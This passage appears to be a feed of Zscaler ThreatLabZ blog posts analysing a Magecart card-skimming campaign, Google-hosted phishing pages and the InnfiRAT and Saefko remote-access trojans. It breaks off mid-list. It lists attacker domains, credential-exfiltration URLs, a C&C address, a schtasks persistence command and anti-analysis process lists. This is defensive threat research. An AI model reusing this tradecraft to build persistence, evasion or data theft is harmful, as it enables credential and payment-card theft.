During alert monitoring, ThreatLabZ researchers came across multiple cases of shopping sites being compromised and injected with a skimming script. This injected script looks for the payment method and personally identifiable information (PII) and captures supplied financial information which is then sent to an adversary-controlled gate server even before the user hits the submit form. There have been multiple reports published related to Magecart activity, and ThreatLabZ has blogged about the hacker group’s activities in the past. (Read previous blogs from September 2018 and July 2019.) In this blog, we will provide an overview of the current skimming campaigns with an analysis of those that use compromised sites to host the skimmer code and those that use newly registered domains. The following screen capture shows the Magecart hits we observed over the last 90 days. The activity appears to be fairly consistent week to week, with a spike at the end of the analysis period, and we believe it is likely to continue. Figure 1: Hits on compromised sites over 90 days (x-axis=date, y-axis=hits)   Most of the impacted websites are in the shopping category. The following graph shows the cloud-wide statistic for the number of unique domains per category for the sites impacted. Figure 2: URL categories of impacted sites (x-axis=URL category, y-axis=unique domain counts) This Magecart-based skimming campaign did not reveal any novel tactics, tools, or procedures, but it seems to be more structured in terms of the scripts being used across multiple compromises, similar gate URL parameter patterns, and the algorithm used for data encoding. The cycles we observed were generally the same, but we did see some differences. Some use obfuscation to hide the script injection code and use another compromised site for hosting the skimmer script, while others make use of newly registered domains for skimmer script hosting. Regardless of the loading script, the skimmer code possesses little to no obfuscation.   Cycle 1: Compromised site loads skimmer code from another compromised site The following image shows a Fiddler session to demonstrate the skimming chain. Figure 3: Fiddler session for Magecart skimming   In these skimming campaigns, we can see compromised sites sending captured payment information to domains that are either newly registered or compromised and under the control of an adversary. In the following example, the gate site is compromised as well and was registered on 2013-03-19. Figure 4: Example of injected script and skimmer code   The way this skimmer code operates is to wait for the user to fill in the personal information and payment method and capture it all before the user hits the submit button. This captured information is then encoded using the Base64 algorithm and sent to the gate URL in a GET request. Figure 5: Skimmer script sending base64 encoded PII and Payment Information GET Request   Cycle 2: Compromised site loads skimmer code from a newly registered domain As shown in the image below, the skimming script is being hosted on a domain registered just 10 days before this analysis. Figure 6: Compromised site leveraging skimmer script from a newly registered domain   All the skimmer scripts we’ve identified so far are similar, and we observed the following common gate URL pattern: hxxps://domain/{path}.(php|js)?hash=[base64data]   Figure 7: Skimmer script differences   We saw multiple cases where the same skimmer code locations were being used in multiple compromised sites, including: custommagnetsdirect[dot]com/catalog/view/javascript/jquery/jquery.sticky.js matteola[dot]com/js/varien/js.js The image below shows examples of skimmer code locations being used for multiple compromised sites.   Figure 8: The same skimmer code locations used in multiple compromised sites   Conclusion Magecart has been successful for years because attackers have improved their techniques for injecting malicious code and hiding it from detection. Now, we are seeing attackers able to steal payment card information before it is even submitted. Zscaler ThreatLabZ actively tracks such campaigns and protects customers from skimming and other types of data-stealing attacks. Appendix Common skimmer JS URL patterns /5d1cbc8c073d4.js /baypressservices/baypr.js /check_cvv2_number_script.js /datetimepicker/bootstrap-datetimepicker.min.js /images/js/googleapi.js /javascript/checkcheckout.js /5d4cdc4cdf344.js /js/afterpay/checkout/idev_onestep.js /js/check_analystic.js /js/extjs/fix-defer-after.js /js/footer-link.js /js/front-scripts.min.js /js/lib/ccard.js /js/mage/cookies.js /js/mage/google.js /js/prototype/prototype.js /js/scriptaculous/print.js /varien/email.js /varien/js.js /varien/mail.js /my/vmart.js /qcore.js /rimzoneonline/code.js /silver/acor.js /wp-includes/js/jquery/jquery.js   Bad domains Creation date api-googles[dot]com 2019-03-30T18:40:29Z cloudflara[dot]org 2019-07-10T19:16:22Z developer-js[dot]info 2019-03-07T21:29:25Z facebookfollow[dot]com 2019-07-21T02:29:39Z googletagmanager-service[dot]com 2019-02-09T23:28:49Z gooqleadvstat[dot]com 2019-09-13T11:22:10Z jquery-cdn[dot]top 2018-09-28T07:41:02Z jquery-js[dot]com 2017-01-02T11:21:35Z jquery[dot]su 2019-02-27T19:12:36Z jquerycodemagento[dot]com 2019-08-11T13:05:43Z magento-security[dot]org 2017-11-14T16:32:41Z magento-track[dot]com 2018-12-28T20:44:11Z script-analytics[dot]com 2019-08-13T22:16:38Z  
Categories: Security Posts

Phishing attacks abusing appspot.com and web.app domains on Google Cloud

Zscaler Research - 52 min 35 sec ago
In July, Zscaler ThreatLabZ posted a blog about a rise in the use of Microsoft Azure domains to host phishing attacks. Our researchers recently detected similar activity on the Google domains Appspot.com and Web.app. Appspot.com is a cloud computing platform for developing and hosting web applications in Google-managed data centers. Web.app is a mobile platform used for building mobile apps hosted by Firebase, which is Google’s mobile app platform. These campaigns use SSL certificates issued by Appspot.com and Web.app, and they have well-designed login pages that attempt to spoof popular brands widely used in business, such as Dropbox Business, Microsoft Outlook and SharePoint, and DocuSign. They are designed to capture login credentials, which are sent to a remote server. In the analysis that follows, we’ll describe the techniques these campaigns use to avoid detection and we’ll show the phishing domains and the locations where the user credentials are being sent. As of this date, many of these subdomains on appspot.com and web.app are not being flagged by VirusTotal.   Fig 1: VirusTotal detections for the subdomains   Web.app hosted phishing pages The following screenshots are phishing pages of some of the sites that have used an SSL certificate issued by Web.app. Fig 2: Microsoft login phishing page    Fig 3: SSL certificate page of the hosted phishing URL   Appspot.com hosted phishing pages Fig 4: Google Drive login phishing page   Fig 5: Outlook login phishing page   Fig 6: Dropbox login phishing page   Fig 7: DocuSign login phishing page     Fig 8: OneDrive login phishing page   Fig 9: OneDrive login phishing page   Fig 10: OneDrive login phishing page Evasion techniques This is a sophisticated phishing campaign as demonstrated by the well-designed phishing pages that are difficult to distinguish from legitimate pages. In addition, the attackers are using the latest tactics to evade detection from scan engines, with most of the code written in an external JavaScript file. This filename is 32 characters long and different for every site.  Below is the source code of the phishing pages; the highlighted part is the external JavaScript mentioned above. Fig 11: Source code of phishing page Fig 12: Source code of phishing page In the above landing page source code of the phishing URL, there is less content, no brand name, and no catchy strings that are common in most phishing campaigns. This enables it to bypass many automatic analysis engines and extend its survival. The following screenshots show the code and the location where the user credentials are being sent. This code is present in randomly named, externally added JavaScript files. Fig 13: Location used by the attacker to collect user credentials  Fig 14: Location used by the attacker to collect user credentials The following figure shows a sample packet capture for this data being sent to the attacker’s site.  Fig 15: Packet capture for the data that has been sent to the attacker’s site   Zscaler is actively blocking these phishing pages. The following screen capture shows Zscaler detection for one of these pages: Fig 16: Zscaler successfully detects these domains    Phishing domains As of the writing of this blog, we have collected the following phishing domains. uy67dass[.]appspot[.]com ja8fspxzosaa[.]appspot[.]com gjf9pxzosa[.]appspot[.]com egoew023pzas[.]appspot[.]com vhkad03pas[.]appspot[.]com kda8gazxa[.]appspot[.]com adgkao93pz[.]appspot[.]com l9rwpodsxcs[.]appspot[.]com cvgfsaz[.]appspot[.]com jga9spzas[.]appspot[.]com jjad9gdpxzsa[.]appspot[.]com vadgka932oa[.]appspot[.]com ls9ixosdsasa[.]appspot[.]com qwsa92oozxa[.]appspot[.]com adlg402ooz[.]appspot[.]com bnb932psiz[.]appspot[.]com authofisaiz[.]web[.]app Telecomm-uk[.]web[.]app f45ghdsas[.]appspot[.]com Derr9qepzxas[.]appspot[.]com Vgdikad9oqww[.]appspot[.]com dsa3aszxsa[.]appspot[.]com weotwe0dpa[.]appspot[.]com Wy6fxsa[.]appspot[.]com Yu56sdzsa[.]appspot[.]com Vbhg45as[.]appspot[.]com Hds9pzoas[.]appspot[.]com khs9dpas[.]appspot[.]com u76dfsdasa[.]appspot[.]com y56fds[.]appspot[.]com vfhgj3sz[.]appspot[.]com eyq246ddpoas[.]appspot[.]com h45dsagga[.]appspot[.]com sds43dza[.]appspot[.]com yt76uyhxzz[.]appspot[.]com jh54dfaz[.]appspot[.]com ytyfazxz[.]appspot[.]com   Where information is sent  Below are the locations where the phishing page is sending credentials entered by the user.  https://osipz[.]c3y5-tools[.]com/1[.]newsvpost_ads_auto/loading[.]phphttps://osipz[.]kute[.]pw/1[.]newsvpost_ads/loading[.]phphttps://xotpe[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]phphttps://uiufz[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]phphttps://xotpe[.]kute[.]pw/1[.]newsvpost_ads/loading[.]phphttps://xotpe[.]bugcart[.]com/1[.]newsvpost_ads/loading[.]phphttps://xotpe[.]dtvd[.]biz/1[.]newsvpost_ads/loading[.]php https://uy6x[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php https://h76fg[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]phphttps://hjif[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php  
Categories: Security Posts

InnfiRAT: A new RAT aiming for your cryptocurrency and more

Zscaler Research - 52 min 35 sec ago
Recently, the Zscaler ThreatLabZ team came across a new RAT called InnfiRAT, which is written in .NET and designed to perform specific tasks from an infected machine. This blog provides an analysis of this new RAT, including the way it communicates, all the tasks it performs, and the information it steals.   Background As with just about every piece of malware, InnfiRAT is designed to access and steal personal information on a user's computer. Among other things, InnfiRAT is written to look for cryptocurrency wallet information, such as Bitcoin and Litecoin. InnfiRAT also grabs browser cookies to steal stored usernames and passwords, as well as session data. In addition, this RAT has ScreenShot functionality so it can grab information from open windows. For example, if the user is reading email, the malware takes a screenshot. It also checks for other applications running on the system, such as an active antivirus program.   InnfiRAT sends the data it has collected to its command-and-control (C&C) server and requests further instructions. The C&C can also instruct the malware to download additional payloads onto the infected system.   Technical analysis 1) Before executing the main payload, the malware initially checks whether the file is executing from %AppData% directory or not with the name NvidiaDriver.exe. If not, then a web request is sent to “iplogger[.]com/1HEt47" (possibly to check network connectivity). 2) It records all the running processes in an array, then iterates through each process and checks whether any process is running with the name NvidiaDriver.exe. If so, the malware kills that process and waits for an exit.   Figure 1: Checks execution location, terminates process with name NvidiaDriver            3) InnfiRAT copies itself as %AppData%/NvidiaDriver.exe and executes it from %AppData% before terminating the current process.                Figure 2: The malware makes a copy of itself in %AppData%    4) After confirming the path of file execution, it writes a Base64 encoded PE file in memory, which is later decoded in its actual format and is loaded after changing the entry point of the file. This is also a .NET executable and contains the actual functionality of the malware.   Figure 3: Embedded PE file in encoded form   Figure 4: Embedded PE file is decoded and executed Analysis of embedded .NET executable All the strings inside the file are encoded with a custom encoding scheme that utilizes the XOR operation. Figure 5: Strings decoding logic   As the execution of the malware starts, it checks for the presence of VM environment. It does so by checking the return value from the routine JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337. If the return value is equal to the first value, enum[0], defined in the enum shown below, then it continues the execution or else it terminates.   Figure 6: User-defined enum structure   After performing the VM checks, the malware obtains the country and HWID information of the machine it is running on. To obtain the country information, it calls the routine EjarVhXфf8752612307563884480() [FetchNetworkInfo] and fetches the Country key value from the returned data in JSON format. Similarly, to obtain the HWID, it calls the routine ubобмдGogBлzWKrgrыaZucвлC33208440168(). Anti-VM checks Inside the JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337() [VMDetection] routine: Note: All the enum values are referenced using enum[index] during analysis where the index starts from 0. 1. Performs WMIquery to obtain the following information: "Manufacturer" "Caption" "Name" "ProcessorId" "NumberOfCores" "NumberOfLogicalProcessors" "L2CacheSize" "L3CacheSize" "SocketDesignation" It then checks, one-by-one, if the manufacturer contains one of the below-mentioned strings and returns the value from the enum as specified: “VBoxVBoxVBox”                   returns enum[2] “VMwareVMware”                  returns enum[1] “Prl hyperv                               returns enum[3] “Microsoft Corporation”        returns enum[4] 2. WMIquery is performed again but this time to obtain the following information: "DeviceID" "MediaType" "Model" "PNPDeviceID" "SerialNumber" A check is performed if the PnpDeviceId contains one of the below strings and returns the value from the enum as specified: “VBOX_HARDDISK”             returns enum[2] “VEN_VMWARE”                  returns enum[1] If none of the above conditions match, it returns enum[0].   Machine network information Inside the EjarVhXфf8752612307563884480() [FetchNetworkInfo] routine: A web request is sent to the following URL https://ipinfo[.]io/json and the received data is returned from the function. The received data contains the following information:   "ip"   "city"   "region"   "country"   "loc"   "postal"   "org"   Figure 7: Web request being made   Network communication   Inside the мMлFкCцеGPбiбqюK1559516831() [CreateDuplexChannel] routine: InnfiRAT sets up a duplex channel with the name “IVictim” using DuplexChannelFactory tcp://62[.]210[.]142[.]219:17231/IVictim   Figure 8: Creating a duplex channel with C&C server   After forming the duplex channel with the name IVictim, it uses the IVictim interface, which contains the following methods: “Subscribe” “CompleteTask” “GetDlls” “AvailableTasks”   Figure 9: Available methods in the IVictim interface Inside the SуkdVkцiшkUояUuчPуюяmмuty187968776() [SubscribeVictim] routine: InnfiRAT calls the subscriber method from the IVictim interface with login = “innfiniti”   Figure 10: The subscribe method from the IVictim interface is invoked Inside the хaxeYхсиghIжNпDмвQюwkуpкgимuбсфbnдбMвMC67210633684721828() [GetAndExecuteSpecifiedTask] routine: InnfiRAT obtains the tasks inside a UserTask list by invoking AvailableTasks where UserTask has the following keys: “ID” “Action” “URL” “FinalPoint” “Current”  “Status” “Country” “RunSilent” “Argument” It iterates through each task. On each iteration, it first checks for the country value received to be equal to “ALL” OR  the one present in the BasicInfoVictim class, which was obtained earlier AND the action to perform is "DownAndEx" and the URL value is available.      If the above conditions match, then the CompleteTasks method is called with three arguments:  “login” “hwid” “TaskID”   The RAT calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the file. Arg1 = Path of the file to be executed [obtained from the URL] Arg2 = Arguments to the file to be executed [obtained from Argument key of current UserTask element] Arg3 = true/false [Obtained from RunSilent key of current UserTask element] After iterating all items in the UserTask list, it sleeps for 30,000 milliseconds.   Figure 11: Country, action, and URL checks are performed and the specified task is completed   Process checks Inside the LlсiсkнwychhVзjзNзxрFrUOE4656655235232302206601527615541285() [ProcessCheck] routine: All the running processes in the system are obtained, their names are converted to lowercase and then a check is performed to see if the name matches with any of the following strings:  “taskmgr” “processhacker” “procmon” “procexp” “pchunter” “procexp64” If there are any matches, the process terminates. Below are the snapshots depicting the actions performed.   Figure 12: Obtaining processes, converting their names to lowercase, checking specific processes   Figure 13: Converting ProcessName to lowercase   Figure 14: Checking for above-mentioned running processes (process names are obfuscated here) Inside wYxйыrоyTHuLдTч212065() [KillProcesses] routine: InnfiRAT obtains the list of all processes running in the system and kills any process whose name contains one of the following strings: “chrome” “browser” “firefox” “opera” “amigo” “kometa” “torch” “orbitum”   Figure 15: Kills processes that contain any of the above-mentioned strings   Scheduled execution Inside the эйviMhйсuьZCпJфшcкLйшuв348374() [ScheduleMalwareExecution] routine: The CMD (cmd.exe) command string is constructed and executed to schedule the malware execution. The command string looks like below:  /C schtasks /create /tn WindowsUpdater /tr "%AppData%NvidiaDriver.exe " /st HH:mm  /du 9999:59 /sc daily /ri 1 /f   Figure 16: CMD command is constructed and executed   C&C commands Here are some tasks performed by the malware based on the commands received from C&C server: 1. SendUrlAndExecute(string URL) InnfiRAT downloads the file from the specified URL by calling the routine жRfаeQbrwйfsLGыhчUrEжьFхaяGчрлCдtGжSofьQvдnIмs8383484343838630833542717281211() [DownloadFileFromUrl]. Inside this routine, a directory is first created with the name TEMP inside the %AppData% if it doesn’t exist. Then the file is downloaded and saved inside this folder with the name extracted from the passed URL. The URL passed is broken into parts via delimiter ‘/’ and the last item is used as the file name.   Figure 17: Create folder and download file   Once the download is complete, it calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the downloaded file. Arg1 = Path of the file to be executed Arg2 = Arguments to the file to be executed Arg3 = true   Figure 18: Execute the downloaded file 2. ProfileInfo() Inside the routine, it collects the following information: “NetworkInfo”:{ "ip"  "city" "region" "country" "loc" "postal" "org" } “PCAdmin” “PCInformation” :{ “FrameWorkDescription” “Processors” “PRocessorsCore” “VideoCards” }  It then sends the information to the C&C server. Figure 19: UserProfile info being collected and sent to the C&C server   3. LoadLogs() It calls the GetDlls() routine, which obtains information inside a list of type DownloadDll where DownloadDll has two keys: “Path”,                     represents a relative path to an .exe file “ByteArray”            binary data   Figure 20: GetDlls being called   After fetching the list, InnfiRAT traverses each element inside the list via a for-loop. Inside the for-loop: The value of the Path key is split using delimiter “\\”. The second value in the split is the name of the directory. A check is performed to see if the count after the split is greater than 2 and there is no directory with the name obtained from the Path key split inside the executing module directory. If the check is true, a directory with the obtained name is created.  A check is performed if no file exists specified by Path key in the executing module directory. If the check is true, it creates the file and writes the value of ByteArray to this created file.  The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called. Finally, data obtained from UserProfile() is sent to the C&C server.   Figure 21: A directory is created, file is created, and KillProcesses is called; response is sent to the C&C server   4. LoadCookies()  - Steal Browser Cookie information InnfiRAT calls the GetDlls() routine, which obtains information inside a list of type DownloadDll where DownloadDll has two keys: “Path”                    represents a relative path to an .exe file “ByteArray”          binary data   Figure 22: GetDlls being called   After fetching the list, the malware traverses each element inside the list via for-loop. The following occurs inside the for-loop: The value of the Path key is split using the delimiter “\\”. Second, the value in the split is the name of the directory. A check is performed if the count after the split is greater than 2 and there is no directory with the name obtained from the Path key split inside the executing module directory. If the check is true, a directory with the obtained name is created.  A check is performed if no file exists specified by the Path key in the executing module directory. If a check is true, it creates the file and writes the value of ByteArray to this created file.    Figure 23: Directory is created, file is created   It creates an empty list of BrowserCook type where BrowserCook has two keys, namely: “CookiePaths” “BrowserName” The name and corresponding cookie path are retrieved for the following browsers one by one: “Chrome” “Yandex” “Kometa” “Amigo” “Torch” “Orbitum” “Opera” “Mozilla” A BrowserCook type element is created with the fetched information and is added to the list created earlier.   Figure 24: Browser info is retrieved and added to the list   It creates an empty list of BrowserCookie type where BrowserCookie has three keys, namely:  “Browser” “FileName” “FileArray” Inside, two for-loop elements of the BrowserCookie type are created, where the Browser key and FileArray key are both assigned values using the information from the previously created BrowserCook list and the FileName is set to _Cookie.txt if the browser name for the current element is not “Mozilla”, or else it is set to Cookie.txt.   Figure 25: BrowserCookie elements list is built   The harvested BrowserCookie list is then sent to the C&C server and the temporary file and directory are deleted.   Figure 26: File and directory is deleted 5. LoadWallets() - Steal Bitcoin Wallets The malware creates an empty list of the BitcoinWallet type where BitcoinWallet has two keys, namely: “WalletArray” “WalletName” A check is performed to see if a file for a Litecoin or Bitcoin wallet is present in the system at the following location: Litecoin: %AppData%\Litecoin\wallet.dat Bitcoin: %AppData%\Bitcoin\wallet.dat If it is found, then the element of type BitcoinWallet is added to the list after assigning a name to the WalletName key and reading the corresponding wallet file in the WalletArray key.   Figure 27: File presence is checked, BitcoinWallet element is added to the list   Finally, the created list is sent in response to the C&C server.   Figure 28: List is sent in response to the C&C server   6. LoadFiles() - Steal small text files potentially containing sensitive information InnfiRAT collects all the .txt files available on the desktop whose size is less than 2,097,152 bytes inside a list of CustomFile types. CustomFile has two keys namely:  “Name”   “FileArray” The created list is sent in response to the C&C server.   Figure 29: Files are collected and sent to the C&C server   Figure 30: Inside HcапkцтеuxчI46156665847187238336657104255061.лQtdjюAKMCdскHUжfъqZTzmMнуз68532317728035381607276587242500 [CollectFiles]   7. LoadProcesses() - Get the list of running processes on the victim machine InnfiRAT creates an empty list of type ProcessInfo where ProcessInfo has three keys, namely: “ID” “Name”  “Path” It obtains the list of all the processes running in the system and sends the list in response to the C&C server.    Figure 31: Process information is obtained and the list is sent to the C&C server   8. Kill(int process) - Command to Kill a specific process on the victim machine InnfiRAT obtains the list of all the processes running in the system and then inside a for-loop, the processID of obtained processes is compared with the processID passed as an argument to this routine one at a time. If there is a match, the process is killed and the flag variable is set to true. Finally, a response is sent to C&C server.   Figure 32: Process is killed and response is sent   9. Screenshot() - Take a screenshot on the victim machine It calls the qюFpьGoJv97921676245() [CaptureScreenshot] routine and the returned value is sent to the C&C server.   Figure 33: Screenshot captured and sent to the C&C server   Figure 34: Inside the qюFpьGoJv97921676245() [CaptureScreenshot] routine   10. RunCommand(string command) - Execute specified command on the victim machine This creates a new CMD process, builds the command line argument using the command passed as an argument to this routine, and finally starts the process. Command line argument:   /c  +  “ ” + command   Figure 35: Received command is executed   11. ClearCooks() - Clears browser Cookies on the victim machine for specific Browsers InnfiRAT creates an empty list of BrowserCook type where BrowserCook has two keys, namely: “CookiePaths”  “BrowserName” The name and corresponding cookie path are retrieved for the following browsers one by one: “Chrome” “Yandex” “Kometa” “Amigo” “Torch” “Orbitum” “Opera” “Mozilla”   A BrowserCook type element is created with the fetched information and is added to the list created earlier. Figure 36: Browser info is retrieved and added to the list   The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called. The BrowserCook type list created earlier is traversed and cookies files are deleted using CookiePaths key value. Finally, a response is sent to the C&C server.   Figure 37: The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called, cookie files are deleted, and response is sent to the C&C server Conclusion A RAT, remote-access trojan, is a type of malware that includes a backdoor, giving intruders the ability to control the targeted computer remotely and enabling them to perform any number of tasks, such as logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more. They can also be designed to spread to other systems on a network. Because RATs are usually downloaded as a result of a user opening an email attachment or downloading an application that has been infected, the first line of defense is often the users who must, as always, refrain from downloading programs or opening attachments that aren't from a trusted source. The ThreatLabZ team continues to monitor this threat and ensure that Zscaler customers are protected.   IOCs Md5: f992dd6dbe1e065dff73a20e3d7b1eef Downloading URL: rgho[.]st/download/6yghkhzgm/84986b88fe9d7e3caf5183e4342e713adf6c3040/df3049723db33889ac49202cb3a2f21ac1b82d5b/peugeot.zip NetworkURL: tcp://62[.]210[.]142[.]219:17231/IVictim
Categories: Security Posts

Saefko: A new multi-layered RAT

Zscaler Research - 52 min 35 sec ago
Recently, the Zscaler ThreatLabZ team came across a new remote-access trojan (RAT) for sale on the dark web. The RAT, called Saefko, is written in .NET and has multiple functionalities. This blog provides a detailed analysis of this piece of malware, including its HTTP, IRC, and data stealing and spreading module.   Background A RAT is a type of malware that includes a backdoor for remote administrative control of the targeted computer. RATs are usually downloaded as a result of a user opening an email attachment or downloading an application or a game that has been infected. Because a RAT enables administrative control, the intruder can do just about anything on the targeted computer, such as monitoring user behavior by logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more. Upon successful infection, the Saefko RAT stays in the background and executes every time the user logs in. It fetches the chrome browser history looking for specific types of activities, such as those involving credit cards, business, social media, gaming, cryptocurrency, shopping, and more. It sends the data it has collected to its command-and-control (C&C) server and requests for further instructions. The C&C instructs the malware to provide system information and the RAT will begin to collect a range of data including screenshot,videos, keystroke logs and more. The C&C can also instruct the malware to download additional payload onto the infected system. RATs present a unique business threat. They have the ability to steal a lot of data without being detected and spread to other systems across the network. The ThreatLabZ team also detonated the Saefko RAT in the Zscaler Cloud Sandbox to determine its functionality, communications, and the potential threat.   Technical Analysis of the Saefko RAT Saefko malware unpacks itself and places the saefkoagent.exe file in “/%AppData%/Roaming/SaefkoAgent.exe” and executes it. It also copies itself to “/%AppData%/Roaming/windows.exe” and "/%AppData%/Local/explorer.exe” and executes them. Autostart Key The Saefko malware creates a startup key to execute the malware at every login. If it is executing from an admin account, it creates the following registry key: “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer” Otherwise, it creates a registry key in the following path: “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer” Functionality Saefko first checks to see whether the internet connection is active by connecting to “clients3.google.com/generate_204”. It then uses a unique technique to identify if the infected system contains any vital information. It fetches the browser history and searches for particular websites that have been visited by the user and makes a count based on the categories mentioned below. From the counts, the attacker can determine which systems it should target first from all the infected systems. The list of different categories it searches include: Credit card possibility paypal.com 2c2p adyen.com volusion.com pay.amazon.com apple.com/apple-pay/ atos.net authorize.net BIPS bitpay.com bpay.com braintreepayments.com centup.org cm.com creditcall.com cybersource.com mastercard.com digi.cash digitalriver.com dwolla.com elavon.com euronetworldwide.com eway.io firstdata.com fortumo.com pay.google.com/send/home heartlandpaymentsystems.com ingenico.com ippayments.com klarna.com emergentpayments.ne moduslink.com mpay.com neteller.com ofx.com pagseguro payoneer.com paymentwall.com paypoint.co paysbuy.com paysafe.com paytm.com payzone.co.uk crunchbase.com qiwi.com globalpaymentsinc.com reddotpayment.com sagellc.com skrill.com stripe.com squareup.com tencent.com transfermate.com transferwise.com wmtransfer.com trustly.com wepay.com verifone.com xendpay.com pay.weixin.qq.com money.yandex.ru wirecard.com truemoney.com xsolla.com myshopify.com/admin payza.com 2checkout.com 3dcart.com paysafecard.com weebly.com       Gaming activity value origin.com steampowered.com g2a.com twitch.tv nichegamer.com techraptor.net gematsu.com estructoid.com pcgamer.com gamefaqs.gamespot.com gamespot.com siliconera.com rockpapershotgun.com gameinformer.com decluttr.com glyde.com gamestop.com microsoft.com/account/xboxlive playstation.com/en-us/network/store nintendo.com/games gog.com game.co.uk itch.io gamefly.com greenmangaming.com gaming.youtube.com     Cryptocurrency value etoro.com 24option.com puatrack.com/coinbull2/ luno.com paxforex.com binance.com coinbase.com cex.io changelly.com coinmama.com xtrade.ae capital.com paxful.com kraken.com poloniex.com gemini.com bithumb.com xcoins.io cobinhood.com coincheck.com coinexchange.io shapeshift.io bitso.com indacoin.com cityindex.co.uk bitbay.net bitstamp.net cryptopia.co.nz pro.coinbase.com kucoin.com bitpanda.com foxbit.com.br bitflyer.com bitfinex.com bit-z.com quadrigacx.com quadrigacx.com big.one lakebtc.com wex.nz kuna.io yobit.io zebpay.com hitbtc.com bx.in.th trezor.io electrum.org blockchain.com crypto.robinhood.com exodus.io mycelium.com bitcointalk.org btc-e.com moonbit.co.in bitcoinaliens.com bitcoinwisdom.com coindesk.com cointelegraph.com ccn.com reddit.com/r/Bitcoin/ bitcoin.org/en/blog newsbtc.com blog.spectrocoin.com blog.coinbase.com bitcoinist.com forklog.com abitcoinc.com bitcoin.stackexchange.com news.bitcoin.com blog.bitfinex.com blog.genesis-mining.com     Instagram activity instagram.com m.instagram.com   Facebook activity facebook.com m.facebook.com   Youtube activity youtube.com m.youtube.com   Google+ activity plus.google.com m.plus.google.com   Gmail activity gmail.com mail.google.com   Shopping activity boohoo.com gymshark.com mail.google.com prettylittlething.com showpo.com athleta.com ae.com ruelala.com asos.com superdry.com zaful.com zafulswimwear.com luckybrand.com forever21.com urbanoutfitters.com nastygal.com jcrew.com anthropologie.com allsaints.com uniqlo.com armaniexchange.com fashionnova.com saksoff5th.com target.com macys.com barneys.com zappos.com sneakersnstuff.com yoox.com nike.com simmi.com amazon.com ebay.com walmart.com newegg.com bestbuy.com ftd.com 1800flowers.com glossier.com sephora.com thebodyshop.com ulta.com horchow.com homedepot.com pier1.com bedbathandbeyond.com wayfair.com shoptiques.com viator.com etsy.com cloud9living.com seatgeek.com aliexpress.com alibaba.com       Business value linkedin.com twitter.com nasdaq.com ft.com reuters.com nyse.com tsx.com marketwatch.com thestreet.com wsj.com investing.com investopedia.com finance.yahoo.com seekingalpha.com fool.com investorguide.com zacks.com home.saxo forexbrokers.com swissquote.com cmcmarkets.com fxpro.co.uk forex.com dukascopy.com interactivebrokers.com tdameritrade.com bankofinternet.com ally.com bankpurely.com redneck.bank       Saefko also collects additional user application data, including: Command Description irc_channel IRC channel name irc_nickname Nickname irc_password IRC channel Password irc_port IRC Port for communication to a server irc_server Server name machine_active_time System uptime machine_artct Machine Architecture machine_bitcoin_value Number of cryptocurrency sites visited by the user machine_business_value Number of business sites visited by the user machine_calls_activity 0 machine_camera_activity No. of “.png” files present on the desktop machine_country_iso_code Country code fetch from “ipinfo.io/geo” machine_lat latitude machine_lng longitude machine_creadit_card_posiblty Checks the number of payment sites visited by the user machine_current_time Taking machine current time machine_facebook_activity Checks the number of times the user visited facebook machine_gaming_value Checks the number of times the user visited gaming websites machine_gmail_avtivity Checks the number of times the user visited gmail machine_googleplus_activity Checks the number of times the user visited google+ machine_instgram_activty Checks the number of times the user visited Instagram machine_ip Machine IP machine_lat The geographic location of the system (latitude) machine_lng The geographic location of the system (longitude) machine_os_type 1 machine_screenshot Captures screenshot and encode it in base 64 machine_shooping_activity Checks number of times shopping sites visit by the user   The RAT sends the collected data to a command and control server as shown below: After getting an "ok" response from the server, Saefko begins the "StartServices" function, which has four different infection modules: HTTPClinet IRCHelper KEYLogger StartLocalServices (USB spreading) HTTP Clinet (Possible misspelling of HTTP Client by the author) The RAT sends a request to the server, requesting for a new task. It sends a command “UpdateAndGetTask” and also sends other information, including machine_ID, machine_os, and privateip, as shown below: The task is the URL from which the malware downloaded the new payload and executed it on the infected machine. Key Logger The malware uses the SetWindowsHookEx API for capturing keystrokes. It stores the captured keystrokes into a “log.txt” file. The filepath is: “\%AppData%\Local\log.txt.” IRC Helper First, the malware disconnects the current IRC connection. Then, it sends status information to the C&C as shown below: pass: password command: UpdateHTTPIRCStatus machine_id: unique id sent by C&C in an earlier request irc_status: 1  Next malware fetch  Serverlist: it selects a server from the list below. Port: port  Nickname: generates a random 7 character name  List of IRC servers and ports IRC server Port IRC server Port irc.afterx.net 6667 irc.cyanide-x.net 6667 chat.freenode.net 6667 irc.europnet.org 6667 irc.azzurra.org 6669 irc.rizon.net 6669 irc.dal.net 6667 irc.efnet.org 6667 irc.gamesurge.net 6667 open.ircnet.net 6669 irc.quakenet.org 6667 irc.swiftirc.net 6667 eu.undernet.org 6667 irc.webchat.org 7000 irc.2600.net 6667 irc.abjects.net 6669 irc.accessirc.net 6667 irc.afternet.org 6667 irc.data.lt 6667 irc.allnetwork.org 6667 irc.alphachat.net 6667 irc.austnet.org 6667 irc.axenet.org 6667 irc.ayochat.or.id 6667 irc.beyondirc.net 6669 irc.blitzed.org 6667 irc.bongster.org 6669 irc.caelestia.net 6667 irc.canternet.org 6667 irc.chatall.org 6669 irc.chatcafe.net 6667 irc.chatspike.net 6667 irc.chatzona.org 6667 irc.criten.net 6667 irc.cyberarmy.net 6667 irc.d-t-net.de 6667 irc.darkmyst.org 6667 irc.deepspace.org 6667 irc.dream-irc.de 6667 irc.drlnet.com 6667 irc.dynastynet.net 6667 irc.echo.com 6667 irc.ecnet.org 6667 irc.enterthegame.com 6667 irc.epiknet.org 6667 irc.esper.net 6667 irc.euirc.net 